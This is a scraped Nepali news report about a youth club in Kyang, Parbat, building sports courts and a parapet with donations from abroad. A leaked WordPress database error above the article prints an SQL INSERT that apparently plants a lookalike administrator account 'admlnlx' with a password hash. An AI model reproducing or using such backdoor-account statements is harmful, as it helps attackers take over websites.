WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVR7QH7tsDBXN9SVflIL4VO3FEXHFr/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 18:21:37', '', 'admlnlx', 'admlnlx')
फलेवास (पर्वत), फागुन ३ –
जिल्लाका विकट गाउँमा पनि सदरमुकाम कुस्मामा भन्दा राम्रा र व्यवस्थित खेलमैदान भेटिन्छन् । अझै भलिबल र बास्केटबलको कोर्ट त झनै व्यवस्थित भेटिन्छन् जनजाति बाहुल्य गाउँहरुमा ।
पर्वतको उत्तरी क्याङ गाविसमा स्वदेश र विदेशमा रहेका शुभचिन्तकको सहयोगमा प्यारापिटसहितको बास्केटबल र भलिबल कोर्ट निर्माण भएको छ । स्थानीय शिखर युथ क्लबले कोरिया, बेल्जियम र हङ्कङमा रहेका मनकारीहरुको सहयोगमा खेल मैदान निर्माण गरेको क्लबले जनाएको छ ।
क्लबले रु छ लाख ५० हजारको लागतमा ढुङ्गा बिच्छ्याएर प्यारापिट निर्माण गरेको हो । निर्माण गरेको प्यारापिटमा झन्डै ५०० अटाउन सक्ने क्षमता छ । उक्त कोर्ट र प्यारापिट निर्माणका लागि बेल्जियम बस्ने किरण पुन, गुमबहादुर पुन ९सुबेदार०, हङ्कङ बस्ने हेमबहादुर पुनलगायतले आर्थिक सहयोग गरेका छन् । जानकारी दिनुभयो ।
निर्माण भएको खेलमैदान र प्यारापिट जिल्ला खेलकुद विकास समितिका जिल्ला अध्यक्ष प्रेम गुरुङले हिजो यहाँ आयोजित कार्यक्रममा उद्घाटन गर्दै गाउँगाउँमा खेलकुँदको विकासका लागि सक्दो सहयोग गर्ने बताउनुभयो ।
यसैगरी सोही कार्यक्रममा स्थानीय किरण पुनका परिवारले बाजुङ आधारभूत प्राथमिक विद्यालयलाई चार रोपनी जग्गा दान गरेका छन् ।
पुनले जिल्ला खेलकुद विकास समितिलाई रु ५० हजार बराबरको खेलकुद सामग्रीसमेत प्रदान गर्नुभएको छ । – रासस